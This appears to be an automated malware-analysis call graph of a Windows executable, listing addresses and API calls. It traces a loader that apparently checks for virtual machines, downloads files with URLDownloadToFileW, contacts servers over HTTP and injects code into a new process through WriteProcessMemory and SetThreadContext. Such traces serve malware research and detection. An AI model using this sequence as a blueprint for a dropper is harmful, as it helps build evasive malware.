40625c 7226->7228 7227->7228 7229 406266 InterlockedDecrement 7228->7229 7231 406269 7228->7231 7229->7231 7230 40627e InterlockedDecrement 7230->7231 7231->7230 7232 40628e InterlockedDecrement 7231->7232 7233 406297 InterlockedDecrement 7231->7233 7232->7231 7233->7221 7235 4060db 7234->7235 7238 40606e 7234->7238 7236 403199 ___free_lc_time 4 API calls 7235->7236 7237 406128 7235->7237 7240 4060fc 7236->7240 7249 40614f 7237->7249 7292 40a28c 7237->7292 7238->7235 7244 403199 ___free_lc_time 4 API calls 7238->7244 7246 4060a2 7238->7246 7242 403199 ___free_lc_time 4 API calls 7240->7242 7247 40610f 7242->7247 7243 403199 ___free_lc_time 4 API calls 7243->7249 7250 406097 7244->7250 7245 40618e 7251 403199 ___free_lc_time 4 API calls 7245->7251 7252 403199 ___free_lc_time 4 API calls 7246->7252 7263 4060c3 7246->7263 7253 403199 ___free_lc_time 4 API calls 7247->7253 7248 403199 ___free_lc_time 4 API calls 7254 4060d0 7248->7254 7249->7245 7260 403199 HeapFree GetLastError VirtualAlloc VirtualAlloc ___free_lc_time 7249->7260 7268 40a45c 7250->7268 7257 406194 7251->7257 7258 4060b8 7252->7258 7259 40611d 7253->7259 7255 403199 ___free_lc_time 4 API calls 7254->7255 7255->7235 7257->7207 7284 40a41c 7258->7284 7262 403199 ___free_lc_time 4 API calls 7259->7262 7260->7249 7262->7237 7263->7248 7265 403d12 __lseeki64 7264->7265 7266 403e4e VirtualAlloc 7265->7266 7267 403e6c 7266->7267 7269 40a465 7268->7269 7283 40a4e2 7268->7283 7270 40a476 7269->7270 7271 403199 ___free_lc_time 4 API calls 7269->7271 7272 40a488 7270->7272 7273 403199 ___free_lc_time 4 API calls 7270->7273 7271->7270 7274 40a49a 7272->7274 7275 403199 ___free_lc_time 4 API calls 7272->7275 7273->7272 7276 403199 ___free_lc_time 4 API calls 7274->7276 7277 40a4ac 7274->7277 7275->7274 7276->7277 7278 40a4be 7277->7278 7279 403199 ___free_lc_time 4 API calls 7277->7279 7280 40a4d0 7278->7280 7281 403199 ___free_lc_time 4 API calls 7278->7281 7279->7278 7282 403199 ___free_lc_time 4 API calls 7280->7282 7280->7283 7281->7280 7282->7283 7283->7246 7285 40a425 7284->7285 7286 40a459 7284->7286 7287 40a435 7285->7287 7289 403199 ___free_lc_time 4 API calls 7285->7289 7286->7263 7288 40a447 7287->7288 7290 403199 ___free_lc_time 4 API calls 7287->7290 7288->7286 7291 403199 ___free_lc_time 4 API calls 7288->7291 7289->7287 7290->7288 7291->7286 7293 40a299 7292->7293 7294 406148 7292->7294 7295 403199 ___free_lc_time 4 API calls 7293->7295 7294->7243 7296 40a2a1 7295->7296 7297 403199 ___free_lc_time 4 API calls 7296->7297 7298 40a2a9 7297->7298 7299 403199 ___free_lc_time 4 API calls 7298->7299 7300 40a2b1 7299->7300 7301 403199 ___free_lc_time 4 API calls 7300->7301 7302 40a2b9 7301->7302 7303 403199 ___free_lc_time 4 API calls 7302->7303 7304 40a2c1 7303->7304 7305 403199 ___free_lc_time 4 API calls 7304->7305 7306 40a2c9 7305->7306 7307 403199 ___free_lc_time 4 API calls 7306->7307 7308 40a2d0 7307->7308 7309 403199 ___free_lc_time 4 API calls 7308->7309 7310 40a2d8 7309->7310 7311 403199 ___free_lc_time 4 API calls 7310->7311 7312 40a2e0 7311->7312 7313 403199 ___free_lc_time 4 API calls 7312->7313 7314 40a2e8 7313->7314 7315 403199 ___free_lc_time 4 API calls 7314->7315 7316 40a2f0 7315->7316 7317 403199 ___free_lc_time 4 API calls 7316->7317 7318 40a2f8 7317->7318 7319 403199 ___free_lc_time 4 API calls 7318->7319 7320 40a300 7319->7320 7321 403199 ___free_lc_time 4 API calls 7320->7321 7322 40a308 7321->7322 7323 403199 ___free_lc_time 4 API calls 7322->7323 7324 40a310 7323->7324 7325 403199 ___free_lc_time 4 API calls 7324->7325 7326 40a318 7325->7326 7327 403199 ___free_lc_time 4 API calls 7326->7327 7328 40a323 7327->7328 7329 403199 ___free_lc_time 4 API calls 7328->7329 7330 40a32b 7329->7330 7331 403199 ___free_lc_time 4 API calls 7330->7331 7332 40a333 7331->7332 7333 403199 ___free_lc_time 4 API calls 7332->7333 7334 40a33b 7333->7334 7335 403199 ___free_lc_time 4 API calls 7334->7335 7336 40a343 7335->7336 7337 403199 ___free_lc_time 4 API calls 7336->7337 7338 40a34b 7337->7338 7339 403199 ___free_lc_time 4 API calls 7338->7339 7340 40a353 7339->7340 7341 403199 ___free_lc_time 4 API calls 7340->7341 7342 40a35b 7341->7342 7343 403199 ___free_lc_time 4 API calls 7342->7343 7344 40a363 7343->7344 7345 403199 ___free_lc_time 4 API calls 7344->7345 7346 40a36b 7345->7346 7347 403199 ___free_lc_time 4 API calls 7346->7347 7348 40a373 7347->7348 7349 403199 ___free_lc_time 4 API calls 7348->7349 7350 40a37b 7349->7350 7351 403199 ___free_lc_time 4 API calls 7350->7351 7352 40a383 7351->7352 7353 403199 ___free_lc_time 4 API calls 7352->7353 7354 40a38b 7353->7354 7355 403199 ___free_lc_time 4 API calls 7354->7355 7356 40a393 7355->7356 7357 403199 ___free_lc_time 4 API calls 7356->7357 7358 40a39b 7357->7358 7359 403199 ___free_lc_time 4 API calls 7358->7359 7360 40a3a9 7359->7360 7361 403199 ___free_lc_time 4 API calls 7360->7361 7362 40a3b4 7361->7362 7363 403199 ___free_lc_time 4 API calls 7362->7363 7364 40a3bf 7363->7364 7365 403199 ___free_lc_time 4 API calls 7364->7365 7366 40a3ca 7365->7366 7367 403199 ___free_lc_time 4 API calls 7366->7367 7368 40a3d5 7367->7368 7369 403199 ___free_lc_time 4 API calls 7368->7369 7370 40a3e0 7369->7370 7371 403199 ___free_lc_time 4 API calls 7370->7371 7372 40a3eb 7371->7372 7373 403199 ___free_lc_time 4 API calls 7372->7373 7374 40a3f6 7373->7374 7375 403199 ___free_lc_time 4 API calls 7374->7375 7376 40a401 7375->7376 7377 403199 ___free_lc_time 4 API calls 7376->7377 7378 40a40c 7377->7378 7379 403199 ___free_lc_time 4 API calls 7378->7379 7379->7294 6821 1380000 6822 138012d 6821->6822 6823 138020a VirtualAlloc 6822->6823 6824 1380227 6823->6824 6827 1380980 6824->6827 6828 13802b6 6827->6828 6829 13809c2 6827->6829 6829->6828 6833 1380700 VirtualAlloc 6829->6833 6834 1380764 6833->6834 6835 138076b 6833->6835 6837 2b5145f LoadLibraryA 6834->6837 6846 1380570 6835->6846 6838 2b5147b 6837->6838 6839 2b51484 GetSystemTimeAsFileTime 6838->6839 6840 2b514c0 GetCurrentProcess TerminateProcess 6838->6840 6841 2b514ad __aulldiv 6839->6841 6840->6828 6850 2b5372c 6841->6850 6844 2b514bb 6879 2b5138f GetModuleHandleA 6844->6879 6849 13805f2 6846->6849 6847 13806e1 6847->6834 6848 1380683 LoadLibraryA 6848->6849 6849->6847 6849->6848 6898 2b533db RegOpenKeyExW 6850->6898 6853 2b5375b lstrcpyA 6910 2b5355b 6853->6910 6854 2b53755 6939 2b53c33 6854->6939 6858 2b514b7 6858->6840 6858->6844 6860 2b537af 6860->6860 6861 2b537c6 StrStrIW 6860->6861 6862 2b538ff 6860->6862 6864 2b537ed StrStrIW 6861->6864 6867 2b538ea 6861->6867 6946 2b53d67 6862->6946 6865 2b53803 StrStrIW 6864->6865 6864->6867 6865->6867 6868 2b53819 StrStrIW 6865->6868 6867->6854 6868->6867 6869 2b5382f StrStrIW 6868->6869 6869->6867 6870 2b53845 StrStrIW 6869->6870 6870->6867 6871 2b5385b lstrcpyA 6870->6871 6924 2b52e5c 6871->6924 6874 2b53890 StrStrIA 6874->6867 6875 2b538a2 StrStrIA 6874->6875 6875->6867 6876 2b538b4 StrStrIA 6875->6876 6876->6867 6877 2b538c6 StrStrIA 6876->6877 6877->6867 6878 2b538d8 StrStrIA 6877->6878 6878->6867 6880 2b513e3 GetModuleFileNameW 6879->6880 6881 2b513bb VirtualQuery 6879->6881 6882 2b513e1 6880->6882 6883 2b513f8 6880->6883 6881->6880 6884 2b513d0 6881->6884 6885 2b53c33 5 API calls 6882->6885 7027 2b529b2 CreateFileW 6883->7027 6884->6880 6887 2b513d7 6884->6887 6889 2b5145b 6885->6889 6992 2b52d50 6887->6992 6889->6840 6893 2b52d50 12 API calls 6894 2b51414 6893->6894 6894->6882 7034 2b52ac6 GetTempPathW 6894->7034 6899 2b53413 RegQueryInfoKeyW 6898->6899 6900 2b5354c 6898->6900 6902 2b53540 RegCloseKey 6899->6902 6907 2b53450 6899->6907 6901 2b53c33 5 API calls 6900->6901 6903 2b53557 6901->6903 6902->6900 6903->6853 6903->6854 6904 2b5345b RegEnumKeyW 6904->6907 6905 2b53496 StrCatW StrCatW RegOpenKeyExW 6906 2b534dd RegQueryInfoKeyW 6905->6906 6905->6907 6906->6907 6907->6902 6907->6904 6907->6905 6908 2b5352b RegCloseKey 6907->6908 6949 2b5308a RegOpenKeyExW 6907->6949 6908->6907 6911 2b53578 wsprintfW CreateFileW 6910->6911 6915 2b535b0 6911->6915 6912 2b53708 StrNCatA 6913 2b53c33 5 API calls 6912->6913 6914 2b53728 MultiByteToWideChar 6913->6914 6914->6860 6915->6911 6915->6912 6916 2b535e4 DeviceIoControl 6915->6916 6917 2b536f7 CloseHandle 6916->6917 6918 2b53617 DeviceIoControl 6916->6918 6917->6915 6921 2b53642 6918->6921 6919 2b53690 lstrcpyA 6920 2b536b7 lstrcatA 6919->6920 6919->6921 6920->6921 6921->6919 6922 2b536d4 lstrcatA 6921->6922 6923 2b536e7 StrNCatA 6921->6923 6922->6923 6923->6917 6925 2b52fb1 EnumDisplayDevicesA 6924->6925 6926 2b52fbf 6925->6926 6927 2b52e9d 6925->6927 6928 2b53c33 5 API calls 6926->6928 6929 2b52eae lstrcatA lstrcatA lstrcatA lstrcatA lstrcatA 6927->6929 6930 2b52fd0 StrStrIA 6928->6930 6931 2b52d16 lstrcatA 6929->6931 6930->6867 6930->6874 6932 2b52f3a EnumDisplayDevicesA 6931->6932 6933 2b52fa0 GetLastError 6932->6933 6934 2b52f52 6932->6934 6933->6925 6935 2b52f56 lstrcatA lstrcatA 6934->6935 6936 2b52d16 lstrcatA 6935->6936 6937 2b52f84 EnumDisplayDevicesA 6936->6937 6937->6935 6938 2b52f9c 6937->6938 6938->6933 6940 2b53c3c 6939->6940 6941 2b53c3e IsProces 6939->6941 6940->6858 6943 2b53c80 6941->6943 6986 2b53c44 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6943->6986 6945 2b53d63 6945->6858 6987 2b53d73 IsProces 6946->6987 6950 2b530d6 RegQueryInfoKeyW 6949->6950 6951 2b533cc 6949->6951 6950->6951 6956 2b53113 6950->6956 6952 2b53c33 5 API calls 6951->6952 6953 2b533d7 6952->6953 6953->6908 6954 2b533c3 RegCloseKey 6954->6951 6955 2b5313c RegEnumKeyW 6955->6956 6956->6954 6956->6955 6957 2b53178 StrCatW StrCatW RegOpenKeyExW 6956->6957 6968 2b533c2 6956->6968 6958 2b5321f StrCatW RegOpenKeyExW 6957->6958 6959 2b531bf RegQueryValueExA 6957->6959 6960 2b53256 RegQueryValueExW 6958->6960 6961 2b53371 lstrcatA lstrcatA 6958->6961 6959->6958 6962 2b531f6 RegCloseKey 6959->6962 6963 2b53363 lstrcpyA 6960->6963 6971 2b53291 6960->6971 6982 2b52d16 6961->6982 6973 2b52fd4 6962->6973 6963->6961 6967 2b532b1 RegCloseKey 6969 2b5334d lstrcpyA 6967->6969 6967->6971 6968->6954 6969->6961 6970 2b53320 lstrcpyA 6970->6971 6971->6963 6971->6967 6971->6970 6971->6971 6972 2b53348 lstrcatA 6971->6972 6972->6961 6974 2b5306a EnumDisplayDevicesA 6973->6974 6975 2b53015 6974->6975 6981 2b53070 6974->6981 6977 2b53023 EnumDisplayDevicesA 6975->6977 6976 2b53c33 5 API calls 6978 2b53081 lstrcpyA 6976->6978 6979 2b53056 GetLastError 6977->6979 6980 2b53043 StrStrA 6977->6980 6978->6958 6979->6974 6980->6979 6980->6981 6981->6976 6983 2b52d24 6982->6983 6983->6983 6984 2b52d44 lstrcatA 6983->6984 6985 2b52d4c 6983->6985 6984->6985 6985->6956 6986->6945 6988 2b53d87 6987->6988 6991 2b53c44 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6988->6991 6990 2b53904 6991->6990 6993 2b52d77 6992->6993 6994 2b52d84 GetModuleFileNameW CreateFileW 6993->6994 6995 2b52dc0 6994->6995 6996 2b52e49 6994->6996 6998 2b52dda SetFileInformationByHandle 6995->6998 6997 2b53c33 5 API calls 6996->6997 6999 2b513dc 6997->6999 7000 2b52e46 CloseHandle 6998->7000 7001 2b52e03 CloseHandle CreateFileW 6998->7001 7003 2b51000 GetProcessHeap HeapAlloc 6999->7003 7000->6996 7001->6996 7002 2b52e2b SetFileInformationByHandle 7001->7002 7002->7000 7004 2b51043 7003->7004 7087 2b5213b 7004->7087 7006 2b51207 7007 2b53c33 5 API calls 7006->7007 7008 2b51214 7007->7008 7008->6882 7009 2b510dd GetProcessHeap HeapAlloc 7010 2b51057 7009->7010 7010->7006 7010->7009 7011 2b52ac6 19 API calls 7010->7011 7012 2b52ac6 19 API calls 7010->7012 7014 2b51d9d 42 API calls 7010->7014 7016 2b5112a GetProcessHeap HeapFree 7010->7016 7018 2b522f0 40 API calls 7010->7018 7019 2b511ea 7010->7019 7022 2b512c0 GetProcessHeap HeapAlloc 7010->7022 7024 2b512f0 StrCatW 7010->7024 7026 2b51349 CreateProcessW CloseHandle CloseHandle Sleep 7010->7026 7102 2b53b3f 7010->7102 7013 2b51247 PathFileExistsW 7011->7013 7012->7010 7013->7010 7015 2b5125d DeleteFileW URLDownloadToFileW PathFileExistsW 7013->7015 7014->7010 7015->7010 7016->7010 7020 2b51184 GetProcessHeap HeapFree 7018->7020 7019->7006 7023 2b511f3 Sleep 7019->7023 7094 2b53a3d 7019->7094 7020->7010 7022->7010 7022->7024 7023->7006 7023->7019 7024->7010 7025 2b51302 StrCatW StrCatW 7024->7025 7025->7010 7026->7010 7028 2b529dc GetFileSize 7027->7028 7031 2b5140a 7027->7031 7029 2b529ed CloseHandle 7028->7029 7030 2b529f8 GetFileSize GetProcessHeap HeapAlloc ReadFile 7028->7030 7029->7031 7032 2b52a3c CloseHandle 7030->7032 7033 2b52a2a GetProcessHeap HeapFree 7030->7033 7031->6882 7031->6893 7032->7031 7033->7029 7035 2b52aff 7034->7035 7043 2b52c44 7034->7043 7038 2b52b0f PathAppendW 7035->7038 7036 2b53c33 5 API calls 7037 2b5142e 7036->7037 7037->6882 7054 2b522f0 7037->7054 7039 2b52b2b 7038->7039 7040 2b52b5a StrCatW PathFileExistsW 7039->7040 7040->7039 7041 2b52b7b 7040->7041 7042 2b52b8d CreateDirectoryW PathFileExistsW 7041->7042 7042->7043 7044 2b52bae 7042->7044 7043->7036 7045 2b52bd6 PathAppendW DeleteFileW CreateFileW 7044->7045 7045->7043 7046 2b52c12 WriteFile 7045->7046 7047 2b52c35 7046->7047 7048 2b52c3d CloseHandle 7046->7048 7047->7048 7049 2b52c48 GetLongPathNameW 7047->7049 7048->7043 7171 2b52c9c 7049->7171 7052 2b52c82 CloseHandle 7052->7043 7053 2b52c7f 7053->7052 7055 2b52337 7054->7055 7173 2b52730 7055->7173 7058 2b526f5 7061 2b52709 7058->7061 7062 2b526f9 GetProcessHeap HeapFree 7058->7062 7059 2b526e8 TerminateProcess 7059->7058 7060 2b523a1 GetProcessHeap HeapAlloc 7063 2b523c7 7060->7063 7076 2b52359 7060->7076 7064 2b5271d 7061->7064 7065 2b5270d GetProcessHeap HeapFree 7061->7065 7062->7061 7068 2b523d6 StrCatW 7063->7068 7066 2b53c33 5 API calls 7064->7066 7065->7064 7067 2b5272c 7066->7067 7067->6882 7069 2b523ff CreateProcessW 7068->7069 7070 2b523e8 StrCatW StrCatW 7068->7070 7071 2b52429 GetThreadContext 7069->7071 7069->7076 7070->7069 7072 2b5244a 7071->7072 7071->7076 7073 2b5248a GetProcessHeap HeapAlloc 7072->7073 7072->7076 7074 2b524c3 VirtualQueryEx 7073->7074 7075 2b524f1 7074->7075 7075->7074 7075->7076 7077 2b52513 WriteProcessMemory 7075->7077 7076->7058 7076->7059 7077->7076 7079 2b52575 ReadProcessMemory 7077->7079 7079->7076 7080 2b52595 7079->7080 7080->7076 7081 2b525c8 VirtualAllocEx 7080->7081 7081->7076 7082 2b525f4 WriteProcessMemory 7081->7082 7082->7076 7083 2b52618 7082->7083 7084 2b52676 WriteProcessMemory SetThreadContext ResumeThread 7083->7084 7085 2b52638 WriteProcessMemory 7083->7085 7084->7076 7085->7085 7086 2b52670 7085->7086 7086->7084 7089 2b52166 7087->7089 7090 2b521c3 7089->7090 7117 2b51e51 7089->7117 7143 2b51cc7 7089->7143 7092 2b53c33 5 API calls 7090->7092 7093 2b521d5 7092->7093 7093->7010 7095 2b53a4a 7094->7095 7096 2b53a82 InternetCrackUrlW 7095->7096 7097 2b53b2a 7096->7097 7098 2b53af6 7096->7098 7099 2b53c33 5 API calls 7097->7099 7098->7097 7158 2b53905 InternetOpenW 7098->7158 7101 2b53b3b 7099->7101 7101->7019 7103 2b529b2 10 API calls 7102->7103 7106 2b53b72 7103->7106 7104 2b53c20 7107 2b53c33 5 API calls 7104->7107 7105 2b53c10 GetProcessHeap HeapFree 7105->7104 7108 2b51cc7 5 API calls 7106->7108 7110 2b53bfd 7106->7110 7109 2b53c2f 7107->7109 7111 2b53bad 7108->7111 7109->7010 7110->7104 7110->7105 7111->7110 7112 2b53bb2 DeleteFileW CreateFileW 7111->7112 7112->7110 7113 2b53bda WriteFile 7112->7113 7114 2b53bf1 7113->7114 7115 2b53c02 CloseHandle 7113->7115 7114->7115 7116 2b53bf6 CloseHandle 7114->7116 7115->7110 7116->7110 7118 2b51e5e 7117->7118 7119 2b51eaa InternetCrackUrlW 7118->7119 7120 2b51f2f 7119->7120 7121 2b520f7 7119->7121 7120->7121 7122 2b51f45 InternetOpenW 7120->7122 7124 2b5210e 7121->7124 7125 2b5210b InternetCloseHandle 7121->7125 7122->7121 7123 2b51f79 InternetConnectW 7122->7123 7123->7121 7126 2b51faf 7123->7126 7127 2b52118 InternetCloseHandle 7124->7127 7128 2b5211b 7124->7128 7125->7124 7131 2b51fcd HttpOpenRequestW 7126->7131 7127->7128 7129 2b52125 InternetCloseHandle 7128->7129 7130 2b52128 7128->7130 7129->7130 7132 2b53c33 5 API calls 7130->7132 7148 2b514d8 7131->7148 7134 2b52137 7132->7134 7134->7089 7136 2b52003 HttpOpenRequestW InternetSetOptionW InternetSetOptionW wsprintfW HttpAddRequestHeadersW 7136->7121 7137 2b5208e 7136->7137 7138 2b514d8 3 API calls 7137->7138 7139 2b52095 7138->7139 7139->7121 7140 2b52099 InternetReadFile 7139->7140 7141 2b520ce InternetReadFile 7140->7141 7141->7121 7142 2b520c4 7141->7142 7142->7121 7142->7141 7154 2b51c0f 7143->7154 7145 2b51cf2 7146 2b53c33 5 API calls 7145->7146 7147 2b51d99 7146->7147 7147->7089 7149 2b514f5 7148->7149 7150 2b5155b 7148->7150 7149->7150 7151 2b514fc HttpSendRequestW 7149->7151 7150->7121 7150->7136 7152 2b51511 HttpQueryInfoW 7151->7152 7153 2b5154e Sleep 7151->7153 7152->7149 7152->7153 7153->7149 7155 2b51c4d 7154->7155 7156 2b53c33 5 API calls 7155->7156 7157 2b51cc3 7156->7157 7157->7145 7159 2b53a34 7158->7159 7160 2b5394a InternetConnectW 7158->7160 7159->7097 7161 2b53973 HttpOpenRequestW 7160->7161 7162 2b53a2f InternetCloseHandle 7160->7162 7163 2b53a2a InternetCloseHandle 7161->7163 7164 2b539aa 7161->7164 7162->7159 7163->7162 7165 2b539dd HttpSendRequestW 7164->7165 7166 2b539af InternetQueryOptionW InternetSetOptionW 7164->7166 7167 2b539f6 HttpQueryInfoW 7165->7167 7168 2b539ee GetLastError 7165->7168 7166->7165 7169 2b53a27 InternetCloseHandle 7167->7169 7170 2b53a1b 7167->7170 7168->7169 7169->7163 7170->7169 7172 2b52c74 PathFileExistsW 7171->7172 7172->7052 7172->7053 7174 2b52781 GetSystemDirectoryA 7173->7174 7176 2b5274c 7173->7176 7175 2b527a4 GetModuleHandleW GetProcAddress 7174->7175 7183 2b52779 7174->7183 7177 2b527e1 7175->7177 7178 2b527d1 GetCurrentProcess 7175->7178 7176->7174 7176->7183 7179 2b527e9 7177->7179 7181 2b52816 PathAppendA 7177->7181 7178->7177 7180 2b52828 7 API calls 7179->7180 7180->7183 7181->7180 7182 2b53c33 5 API calls 7184 2b52355 7182->7184 7183->7182 7184->7060 7184->7076 7429 407219 SetUnhandledExceptionFilter 7680 40c6f9 7681 40c70a 7680->7681 7684 40c712 7680->7684 7682 40c70f CloseHandle 7681->7682 7681->7684 7682->7684 7683 40c724 7684->7683 7685 40c721 CloseHandle 7684->7685 7685->7683 7433 40ac3b 7434 407c87 __calloc_crt 8 API calls 7433->7434 7435 40ac45 7434->7435 7438 4063cc TlsGetValue 7435->7438 7439 406400 GetModuleHandleA 7438->7439 7440 4063df 7438->7440 7442 406411 7439->7442 7443 4063f8 7439->7443 7440->7439 7441 4063e9 TlsGetValue 7440->7441 7445 4063f4 7441->7445 7444 406360 __initp_misc_cfltcvt_tab 6 API calls 7442->7444 7446 406416 7444->7446 7445->7439 7445->7443 7446->7443 7447 40641a GetProcAddress 7446->7447 7447->7443 7452 40acdc 7453 40acdf 7452->7453 7456 40c52a 7453->7456 7457 40c54f 7456->7457 7460 40c556 7456->7460 7468 406ce5 7457->7468 7502 40ad4f 7460->7502 7462 40c567 _memset 7463 40c615 7462->7463 7466 40c5ea SetUnhandledExceptionFilter UnhandledExceptionFilter 7462->7466 7522 406c6a 7463->7522 7466->7463 7469 406cf1 7468->7469 7501 406e47 7469->7501 7525 40b0dd 7469->7525 7471 406d11 7472 406e4c GetStdHandle 7471->7472 7474 40b0dd __FF_MSGBANNER 6 API calls 7471->7474 7473 406e5a _strlen 7472->7473 7472->7501 7477 406e74 WriteFile 7473->7477 7473->7501 7475 406d22 7474->7475 7475->7472 7476 406d34 7475->7476 7476->7501 7532 40a659 7476->7532 7477->7501 7480 406d6a GetModuleFileNameA 7482 406d88 7480->7482 7486 406dab _strlen 7480->7486 7484 40a659 _strcpy_s 6 API calls 7482->7484 7483 406d67 7483->7480 7485 406d98 7484->7485 7485->7486 7487 405700 __invoke_watson 5 API calls 7485->7487 7498 406dee 7486->7498 7547 40a5a6 7486->7547 7487->7486 7492 40a4e5 _strcat_s 6 API calls 7497 406e23 7492->7497 7493 405700 __invoke_watson 5 API calls 7495 406e12 7493->7495 7494 405700 __invoke_watson 5 API calls 7494->7498 7495->7492 7496 406e34 7565 40af20 7496->7565 7497->7496 7499 405700 __invoke_watson 5 API calls 7497->7499 7556 40a4e5 7498->7556 7499->7496 7501->7460 7503 406443 __amsg_exit 6 API calls 7502->7503 7504 40ad5a 7503->7504 7504->7462 7505 40ad5c 7504->7505 7508 40ad68 __freefls@4 7505->7508 7506 40adc4 7507 40ada5 7506->7507 7511 40add3 7506->7511 7512 406443 __amsg_exit 6 API calls 7507->7512 7508->7506 7508->7507 7509 40ad8f 7508->7509 7514 40ad8b 7508->7514 7614 4065e8 GetLastError 7509->7614 7513 403ce9 __lseeki64 VirtualAlloc 7511->7513 7515 40ad94 _siglookup 7512->7515 7516 40add8 7513->7516 7514->7509 7514->7511 7518 40ad9d _raise __freefls@4 7515->7518 7519 40ae3a __freefls@4 7515->7519 7520 406c6a _abort 13 API calls 7515->7520 7517 4057fc __lseeki64 6 API calls 7516->7517 7517->7518 7518->7462 7519->7518 7521 40643a _raise 10 API calls 7519->7521 7520->7519 7521->7518 7657 406b77 7522->7657 7524 406c77 7526 40b0e8 7525->7526 7527 40b0f2 7526->7527 7528 403ce9 __lseeki64 VirtualAlloc 7526->7528 7527->7471 7529 40b10b 7528->7529 7530 4057fc __lseeki64 6 API calls 7529->7530 7531 40b11b 7530->7531 7531->7471 7533 40a666 7532->7533 7534 40a66e 7532->7534 7533->7534 7539 40a695 7533->7539 7535 403ce9 __lseeki64 VirtualAlloc 7534->7535 7536 40a673 7535->7536 7537 4057fc __lseeki64 6 API calls 7536->7537 7538 406d56 7537->7538 7538->7480 7541 405700 7538->7541 7539->7538 7540 403ce9 __lseeki64 VirtualAlloc 7539->7540 7540->7536 7602 409280 7541->7602 7543 405791 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7544 4057d4 GetCurrentProcess TerminateProcess 7543->7544 7545 4057c8 __invoke_watson 7543->7545 7546 4057f4 setSBUpLow 7544->7546 7545->7544 7546->7483 7551 40a5b6 7547->7551 7548 40a5ba 7549 403ce9 __lseeki64 VirtualAlloc 7548->7549 7550 406ddb 7548->7550 7555 40a5d6 7549->7555 7550->7494 7550->7498 7551->7548 7551->7550 7553 40a600 7551->7553 7552 4057fc __lseeki64 6 API calls 7552->7550 7553->7550 7554 403ce9 __lseeki64 VirtualAlloc 7553->7554 7554->7555 7555->7552 7557 40a4f2 7556->7557 7558 40a4fa 7556->7558 7557->7558 7563 40a52f 7557->7563 7559 403ce9 __lseeki64 VirtualAlloc 7558->7559 7560 40a4ff 7559->7560 7561 4057fc __lseeki64 6 API calls 7560->7561 7562 406e01 7561->7562 7562->7493 7562->7495 7563->7562 7564 403ce9 __lseeki64 VirtualAlloc 7563->7564 7564->7560 7604 40643a 7565->7604 7568 40af48 LoadLibraryA 7569 40b0c1 7568->7569 7570 40af5d GetProcAddress 7568->7570 7569->7501 7570->7569 7573 40af73 7570->7573 7571 40aff0 7572 40b07b 7571->7572 7576 406443 __amsg_exit 6 API calls 7571->7576 7574 406443 __amsg_exit 6 API calls 7572->7574 7601 40b060 7572->7601 7575 4063cc __initp_misc_cfltcvt_tab 10 API calls 7573->7575 7585 40b08b 7574->7585 7578 40af79 GetProcAddress 7575->7578 7579 40b010 7576->7579 7577 406443 __amsg_exit 6 API calls 7577->7569 7580 4063cc __initp_misc_cfltcvt_tab 10 API calls 7578->7580 7581 406443 __amsg_exit 6 API calls 7579->7581 7582 40af8e GetProcAddress 7580->7582 7587 40b01d 7581->7587 7583 4063cc __initp_misc_cfltcvt_tab 10 API calls 7582->7583 7584 40afa3 7583->7584 7607 406a72 7584->7607 7588 406443 __amsg_exit 6 API calls 7585->7588 7585->7601 7587->7572 7590 40b048 7587->7590 7588->7601 7589 40afb1 7591 40afc1 7589->7591 7594 405700 __invoke_watson 5 API calls 7589->7594 7593 406aa9 __initp_misc_cfltcvt_tab 6 API calls 7590->7593 7591->7571 7592 40afca GetProcAddress 7591->7592 7595 4063cc __initp_misc_cfltcvt_tab 10 API calls 7592->7595 7596 40b051 7593->7596 7594->7591 7597 40afd8 7595->7597 7599 405700 __invoke_watson 5 API calls 7596->7599 7596->7601 7597->7571 7598 40afe2 GetProcAddress 7597->7598 7600 4063cc __initp_misc_cfltcvt_tab 10 API calls 7598->7600 7599->7601 7600->7571 7601->7577 7603 40928c __VEC_memzero 7602->7603 7603->7543 7605 4063cc __initp_misc_cfltcvt_tab 10 API calls 7604->7605 7606 406441 7605->7606 7606->7568 7606->7571 7608 406a7d 7607->7608 7609 403ce9 __lseeki64 VirtualAlloc 7608->7609 7610 406aa3 7608->7610 7611 406a82 7609->7611 7610->7589 7612 4057fc __lseeki64 6 API calls 7611->7612 7613 406a92 7612->7613 7613->7589 7628 4064ba TlsGetValue 7614->7628 7617 406653 SetLastError 7617->7515 7618 407c87 __calloc_crt 8 API calls 7619 406611 7618->7619 7619->7617 7620 406443 __amsg_exit 6 API calls 7619->7620 7621 40662b 7620->7621 7622 406632 7621->7622 7623 40664a 7621->7623 7633 406529 7622->7633 7625 403199 ___free_lc_time 4 API calls 7623->7625 7627 406650 7625->7627 7626 40663a GetCurrentThreadId 7626->7617 7627->7617 7629 4064e8 7628->7629 7630 4064cd 7628->7630 7629->7617 7629->7618 7631 406443 __amsg_exit 6 API calls 7630->7631 7632 4064d8 TlsSetValue 7631->7632 7632->7629 7644 404a88 7633->7644 7635 406535 GetModuleHandleA 7636 406586 InterlockedIncrement 7635->7636 7637 406557 7635->7637 7640 4065ad __freefls@4 7636->7640 7638 406360 __initp_misc_cfltcvt_tab 6 API calls 7637->7638 7639 40655c 7638->7639 7639->7636 7641 406560 GetProcAddress GetProcAddress 7639->7641 7645 40619a InterlockedIncrement 7640->7645 7641->7636 7643 4065cc _raise __freefls@4 7643->7626 7644->7635 7646 4061b5 InterlockedIncrement 7645->7646 7647 4061b8 7645->7647 7646->7647 7648 4061c2 InterlockedIncrement 7647->7648 7649 4061c5 7647->7649 7648->7649 7650 4061d2 7649->7650 7651 4061cf InterlockedIncrement 7649->7651 7652 4061dc InterlockedIncrement 7650->7652 7654 4061df 7650->7654 7651->7650 7652->7654 7653 4061f4 InterlockedIncrement 7653->7654 7654->7653 7655 406204 InterlockedIncrement 7654->7655 7656 40620d InterlockedIncrement 7654->7656 7655->7654 7656->7643 7658 406b83 __freefls@4 7657->7658 7659 406443 __amsg_exit 6 API calls 7658->7659 7664 406bf9 _abort __freefls@4 7658->7664 7660 406bb9 7659->7660 7662 406443 __amsg_exit 6 API calls 7660->7662 7661 406c41 __freefls@4 7661->7524 7665 406bc7 7662->7665 7664->7661 7668 406a13 7664->7668 7665->7664 7666 40643a _raise 10 API calls 7665->7666 7667 406443 __amsg_exit 6 API calls 7665->7667 7666->7665 7667->7665 7671 4069ed GetModuleHandleA 7668->7671 7672 406a0c ExitProcess 7671->7672 7673 4069fc GetProcAddress 7671->7673 7673->7672 8177 40395c 8178 403969 8177->8178 8179 406e85 